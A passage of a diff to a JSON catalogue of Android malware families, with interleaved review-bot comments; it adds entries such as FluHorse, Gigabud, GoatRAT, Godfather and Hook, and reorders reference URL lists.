+ "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/",
+ "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
+ "https://mobile.twitter.com/alberto__segura/status/1400396365759500289",
"https://hispasec.com/resources/FedexBanker.pdf",
+ "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9",
+ "https://www.infinitumit.com.tr/flubot-zararlisi/",
+ "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
+ "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/",
+ "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html",
+ "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users",
+ "https://twitter.com/malwrhunterteam/status/1359939300238983172",
+ "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/",
+ "https://blog.zimperium.com/flubot-vs-zimperium/",
+ "https://www.ncsc.admin.ch/22w12-de",
+ "https://www.prodaft.com/m/reports/FluBot_4.pdf",
"https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf",
"https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/",
- "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9",
- "https://twitter.com/malwrhunterteam/status/1359939300238983172",
- "https://twitter.com/alberto__segura/status/1402615237296148483",
- "https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones",
- "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html",
+ "https://twitter.com/alberto__segura/status/1404098461440659459",
+ "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond",
+ "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
"https://therecord.media/flubot-malware-gang-arrested-in-barcelona/",
- "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06",
- "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/",
- "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/",
- "https://twitter.com/alberto__segura/status/1384840011892285440",
- "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain",
- "https://www.ncsc.admin.ch/22w12-de",
- "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368"
+ "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027",
+ "https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones",
+ "https://twitter.com/alberto__segura/status/1402615237296148483"
],
"synonyms": [
"Cabassous",
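Review bot: only two references in the FluBot hunk are actually new, the Spamhaus `2022%20Q3%20Botnet%20Threat%20Update.pdf` and `2023%20Q1%20Botnet%20Threat%20Update.pdf` reports; the remaining roughly forty changed lines are a reshuffle of the existing list, the same ordering churn as in the Chrysaor hunk, and it makes review of a refs-only update disproportionately expensive. Deterministic ordering of `refs` before serialisation fixes this once for every cluster.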
@@ -1250,6 +1316,19 @@
"uuid": "ef91833f-3334-4955-9218-f106494e9fc0",
"value": "FluBot"
},
+ {
+ "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse",
+ "https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "aeaeb8b2-650e-471d-a901-3c4fbae42854",
+ "value": "FluHorse"
+ },
{
"description": "Zimperium notes that this malware has hit more than 10,000 victims in 140+ countries using social media hijacking, 3rd party app stores and sideloading. ",
"meta": {
@@ -1268,8 +1347,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.funkybot",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
"https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
"https://www.fortinet.com/blog/threat-research/funkybot-malware-targets-japan.html"
],
"synonyms": [],
@@ -1283,12 +1362,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball",
+ "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html",
"https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/",
- "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/",
"https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/",
"https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf",
"https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/",
- "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html"
+ "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program"
],
"synonyms": [],
"type": []
@@ -1301,8 +1381,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost",
- "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/",
- "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/"
+ "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/",
+ "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/"
],
"synonyms": [],
"type": []
@@ -1336,17 +1416,31 @@
"uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5",
"value": "GhostCtrl"
},
+ {
+ "description": "Gigabud is the name of an Android Remote Access Trojan (RAT) Android that can record the victim's screen and steal banking credentials by abusing the Accessibility Service. Gigabud masquerades as banking, shopping, and other applications. Threat actors have been observed using deceptive websites to distribute Gigabud RAT.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gigabud",
+ "https://blog.cyble.com/2023/01/19/gigabud-rat-new-android-rat-masquerading-as-government-agencies/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f188382-7a31-46a5-83c6-5991dfe739ee",
+ "value": "Gigabud"
+ },
{
"description": "Ginp is a mobile banking software targeting Android devices that was discovered by Kaspersky. The malware is able to steal both user credentials and credit cards numbers by implementing overlay attacks. For this, overlay targets are for example the default SMS application. What makes Ginp a remarkable family is how its operators managed to have it remain undetected over time even and it receiving version upgrades over many years. According to ThreatFabric, Ginp has the following features:\r\n\r\nOverlaying: Dynamic (local overlays obtained from the C2)\r\nSMS harvesting: SMS listing\r\nSMS harvesting: SMS forwarding\r\nContact list collection\r\nApplication listing\r\nOverlaying: Targets list update\r\nSMS: Sending\r\nCalls: Call forwarding\r\nC2 Resilience: Auxiliary C2 list\r\nSelf-protection: Hiding the App icon\r\nSelf-protection: Preventing removal\r\nSelf-protection: Emulation-detection.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp",
- "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/",
- "https://www.youtube.com/watch?v=WeL_xSryj8E",
- "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html",
"https://twitter.com/ESETresearch/status/1269945115738542080",
"https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/"
+ "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html",
+ "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/",
+ "https://muha2xmad.github.io/malware-analysis/ginp/",
+ "https://www.youtube.com/watch?v=WeL_xSryj8E",
+ "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/"
],
"synonyms": [],
"type": []
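Review bot: the Gigabud description repeats a word: `"Gigabud is the name of an Android Remote Access Trojan (RAT) Android that can record the victim's screen ..."`; drop the second `Android`. The rest of the hunk is fine, with `https://muha2xmad.github.io/malware-analysis/ginp/` the only new Ginp reference among the reordered lines.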
@@ -1359,10 +1453,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove",
- "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
- "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773",
"https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/",
- "https://www.clearskysec.com/glancelove/"
+ "https://www.clearskysec.com/glancelove/",
+ "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/",
+ "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773"
],
"synonyms": [],
"type": []
@@ -1383,6 +1477,33 @@
"uuid": "a3b6a355-3afe-49ae-9f87-679c6c382943",
"value": "GnatSpy"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goat_rat",
+ "https://labs.k7computing.com/index.php/goatrat-attacks-automated-payment-systems/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f699d295-1072-418b-8aa2-cb36fbd4c6c7",
+ "value": "GoatRAT"
+ },
+ {
+ "description": "According to PCrisk, GodFather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use GodFather to steal account credentials. Additionally, GodFather can steal SMSs, device information, and other data.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather",
+ "https://muha2xmad.github.io/malware-analysis/godfather/",
+ "https://blog.group-ib.com/godfather-trojan"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8e95a9d5-08fb-4f11-b70a-622148bd1e62",
+ "value": "Godfather"
+ },
{
"description": "",
"meta": {
@@ -1414,8 +1535,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact",
- "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail",
- "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/"
+ "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/",
+ "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail"
],
"synonyms": [],
"type": []
@@ -1428,8 +1549,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.gplayed",
- "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html",
- "https://blog.talosintelligence.com/2018/10/gplayerbanker.html"
+ "https://blog.talosintelligence.com/2018/10/gplayerbanker.html",
+ "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html"
],
"synonyms": [],
"type": []
@@ -1468,12 +1589,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff",
+ "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html",
+ "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
"https://blog.talosintelligence.com/2019/10/gustuffv2.html",
"https://www.group-ib.com/media/gustuff/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
- "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html"
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html"
],
"synonyms": [],
"type": []
@@ -1501,8 +1622,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw",
- "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw",
- "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/"
+ "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/",
+ "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw"
],
"synonyms": [],
"type": []
@@ -1515,9 +1636,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox",
+ "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/",
"https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
- "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/"
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/"
],
"synonyms": [],
"type": []
@@ -1530,8 +1651,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit",
- "https://www.lighthousereports.nl/investigation/revealing-europes-nso",
"https://de.lookout.com/blog/hermit-spyware-discovery",
+ "https://www.lighthousereports.nl/investigation/revealing-europes-nso",
"https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/"
],
"synonyms": [],
@@ -1558,11 +1679,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/",
"https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users",
- "https://twitter.com/LukasStefanko/status/1136568939239137280",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://securelist.com/mobile-malware-evolution-2019/96280/"
+ "https://twitter.com/LukasStefanko/status/1136568939239137280"
],
"synonyms": [],
"type": []
@@ -1583,22 +1704,37 @@
"uuid": "96bea6aa-3202-4352-8e36-fa05c677c0e8",
"value": "HilalRAT"
},
+ {
+ "description": "According to ThreatFabric, this is a malware family based on apk.ermac. The name hook is the self-advertised named by its vendor DukeEugene. It provides WebSocket communication and has RAT capabilities.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook",
+ "https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware",
+ "https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c101bc42-1011-43f6-9d30-629013c318cd",
+ "value": "Hook"
+ },
{
"description": "Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. The way it does this is by requesting the user enables dangerous permissions such as accessibility and every time the banking app is opened, the malware is hijacking the user by overwriting the legit banking application login page with a malicious one. The goal is the same, to trick the user to enter his login credentials so that it will go straight to the malware authors.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra",
- "https://muha2xmad.github.io/malware-analysis/hydra/",
"https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/",
- "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
- "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5",
- "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726",
- "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
- "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0",
"https://twitter.com/muha2xmad/status/1570788983474638849",
- "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/"
+ "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/",
+ "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0",
+ "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5",
+ "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221",
+ "https://cryptax.medium.com/android-bianlian-payload-61febabed00a",
+ "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/",
+ "https://muha2xmad.github.io/malware-analysis/hydra/",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace",
+ "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726"
],
"synonyms": [],
"type": []
@@ -1627,9 +1763,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.irata",
+ "https://onecert.ir/portal/blog/irata",
"https://twitter.com/muha2xmad/status/1562831996078157826",
- "https://muha2xmad.github.io/malware-analysis/irata/",
- "https://onecert.ir/portal/blog/irata"
+ "https://muha2xmad.github.io/malware-analysis/irata/"
],
"synonyms": [],
"type": []
@@ -1664,22 +1800,22 @@
"value": "JadeRAT"
},
{
- "description": "",
+ "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker",
- "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/",
- "https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2",
- "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1",
"https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/",
"https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/",
- "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html",
- "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1",
"https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/",
- "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/",
"https://labs.k7computing.com/?p=22199",
- "https://muha2xmad.github.io/malware-analysis/hydra/",
- "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451"
+ "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451",
+ "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html",
+ "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html",
+ "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2",
+ "https://muha2xmad.github.io/malware-analysis/hydra/"
],
"synonyms": [
"Bread"
@@ -1735,9 +1871,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter",
- "https://twitter.com/malwrhunterteam/status/1337684036374945792",
- "https://www.youtube.com/watch?v=nilzxS9rxEM",
"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf",
+ "https://www.youtube.com/watch?v=nilzxS9rxEM",
+ "https://twitter.com/malwrhunterteam/status/1337684036374945792",
"https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/"
],
"synonyms": [],
@@ -1764,13 +1900,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot",
- "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html",
- "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view",
- "https://muha2xmad.github.io/mal-document/lokibotpdf/",
+ "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf",
"https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://muha2xmad.github.io/mal-document/lokibotpdf/",
+ "https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view",
"https://isc.sans.edu/diary/27282",
- "https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf"
+ "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html",
+ "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/"
],
"synonyms": [],
"type": []
@@ -1809,9 +1945,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware",
"https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html",
- "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware"
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
],
"synonyms": [
"ExoBot"
@@ -1841,8 +1977,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot",
- "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/",
- "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html"
+ "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html",
+ "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/"
],
"synonyms": [],
"type": []
@@ -1855,9 +1991,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa",
- "https://twitter.com/ThreatFabric/status/1285144962695340032",
"https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
- "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html"
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
+ "https://twitter.com/ThreatFabric/status/1285144962695340032"
],
"synonyms": [
"Gorgona"
@@ -1872,9 +2008,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter",
- "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12",
+ "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe",
+ "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
"https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
- "https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe"
+ "https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12"
],
"synonyms": [],
"type": []
@@ -1882,6 +2019,19 @@
"uuid": "e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52",
"value": "Meterpreter (Android)"
},
+ {
+ "description": "Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, meaning they were likely through other channels like social engineering.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mobile_order",
+ "https://research.checkpoint.com/2022/never-truly-left-7-years-of-scarlet-mimics-mobile-surveillance-campaign-targeting-uyghurs/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ee19588f-9752-4516-85f4-de18acfc64b3",
+ "value": "MobileOrder"
+ },
{
"description": "Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks.\r\nAccording to Lookout researchers, It is believed to be developed by Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.",
"meta": {
@@ -1900,20 +2050,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao",
- "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/",
+ "https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends",
"https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html",
- "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf",
- "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/",
- "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1",
- "https://securelist.com/roaming-mantis-part-v/96250/",
- "https://www.xanhacks.xyz/p/moqhao-malware-analysis",
+ "https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484",
"https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
- "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
- "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
"https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/"
+ "https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/",
+ "https://www.xanhacks.xyz/p/moqhao-malware-analysis",
+ "https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/",
+ "https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/",
+ "https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1",
+ "https://team-cymru.com/blog/2021/01/20/moqhao-part-1-identifying-phishing-infrastructure/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://blog.sekoia.io/ongoing-roaming-mantis-smishing-campaign-targeting-france/",
+ "https://securelist.com/roaming-mantis-part-v/96250/",
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
+ "https://hitcon.org/2019/CMT/slide-files/d2_s1_r1.pdf"
],
"synonyms": [
"Shaoye",
@@ -1950,6 +2103,20 @@
"uuid": "0a53ace4-98ae-442f-be64-b8e373948bde",
"value": "MysteryBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
